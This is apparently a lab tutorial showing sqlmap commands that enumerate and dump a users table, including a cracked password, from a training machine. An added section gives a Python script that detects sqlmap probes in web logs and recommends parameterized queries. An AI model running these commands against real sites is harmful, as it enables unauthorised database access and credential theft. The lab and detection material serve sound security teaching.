SQLi To Shell – SQLMAP

Hey everyone! This is a follow-up to the SQLi to Shell – Manual Injection tutorial. In this tutorial, I’m going to show how to use SQLMap to perform the same injection attack. I won’t be going through the entire challenge again (discovery, exploiting the SQLi, and getting a shell). I just want to focus on the SQL injection part, and show how much faster it can be when using a tool like SQLMap. Let’s go!

If you don’t have it running already, go ahead and fire up your SQLi2Shell machine, and make sure you have Kali running as well. In Kali, open a terminal window. This is where we’ll be typing our sqlmap commands.

We know the vulnerable URL was “http://192.168.1.187/cat.php?id=1”, so we’re going to use that in sqlmap.

Database Info
We’ll start out again getting some basic info about the database. Let’s get the current database name, and the current database user.

Command: sqlmap -u "http://192.168.1.187/cat.php?id=1" --dbms=mysql --current-user --current-db

[Screenshot: sqli2shell-sqlmap1 – sqlmap output]

[Screenshot: sqli2shell-sqlmap2 – current user and current database]

So we have that info, and notice how quickly SQLMap returned the data.

Table Names
Next, we’ll get the table names.

Command: sqlmap -u "http://192.168.1.187/cat.php?id=1" --dbms=mysql --tables

[Screenshot: sqli2shell-sqlmap3-tables – table names]

We’re going to focus on the “users” table.

Column Names
Now we want to get the column names for the “users” table.

Command: sqlmap -u "http://192.168.1.187/cat.php?id=1" --dbms=mysql -T users --columns

[Screenshot: sqli2shell-sqlmap-columns – columns of the users table]

Extract the Data
Now that we have the column names, we need to dump all the data that’s available.

Command: sqlmap -u "http://192.168.1.187/cat.php?id=1" --dbms=mysql -T users -C login,password --dump

[Screenshot: sqli2shell-sqlmap-username – dumped login and password columns]

Perfect! Now we have the username and password hash, and sqlmap was able to crack the hash for us, so the password is “P4ssw0rd”.

You can now take this information, log in to the Admin page, and continue with getting your shell on the box.
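The flip side of how fast sqlmap works is how noisy it is in the web server logs: a burst of requests to cat.php where the id parameter is suddenly not a number, often with sqlmap's default User-Agent. Below is an added example (not from the original post) of the detection a defender could run over Apache combined-format access logs for this lab; the log lines are constructed samples, and the IP addresses and timestamps in them are made up.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log sample: one normal visitor (192.168.1.50) and
# one scanner (192.168.1.99). Both hosts and all timestamps are made up.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Mar/2024:10:00:01 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Mar/2024:10:00:05 +0000] "GET /cat.php?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
192.168.1.99 - - [10/Mar/2024:10:01:00 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.168.1.99 - - [10/Mar/2024:10:01:00 +0000] "GET /cat.php?id=1%27 HTTP/1.1" 500 0 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.168.1.99 - - [10/Mar/2024:10:01:01 +0000] "GET /cat.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.168.1.99 - - [10/Mar/2024:10:01:01 +0000] "GET /cat.php?id=1%20AND%201%3D2 HTTP/1.1" 200 300 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def analyze(log_text, id_param="id"):
    """Return per-source-IP findings for hosts that look like they are probing id=.

    cat.php only ever expects a numeric id, so any non-numeric value (after
    percent-decoding) is treated as a probe. The User-Agent check is a bonus
    signal only: it is trivially spoofable, so the parameter check carries the weight.
    """
    stats = defaultdict(lambda: {"requests": 0, "probes": 0, "sqlmap_ua": False})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        entry = stats[m["ip"]]
        entry["requests"] += 1
        if "sqlmap" in m["ua"].lower():
            entry["sqlmap_ua"] = True
        query = parse_qs(urlsplit(m["path"]).query, keep_blank_values=True)
        for value in query.get(id_param, []):  # parse_qs percent-decodes the value
            if not value.isdigit():
                entry["probes"] += 1
    return {ip: s for ip, s in stats.items() if s["probes"] or s["sqlmap_ua"]}


if __name__ == "__main__":
    for ip, s in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {s['probes']} probes in {s['requests']} requests, sqlmap UA={s['sqlmap_ua']}")
```

The same non-numeric check, applied server-side before the id ever reaches the query (or, better, a parameterized query), is what would have closed this hole in cat.php in the first place.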

That will do it for this one. I know this was a short one, but I wanted to show how simple and fast SQLMap is to use. You still need to know how to perform the attack manually, and once you get that down, feel free to bring SQLMap into the mix to get the job done faster!

Thanks for checking it out!

Be Awesome!

-Jason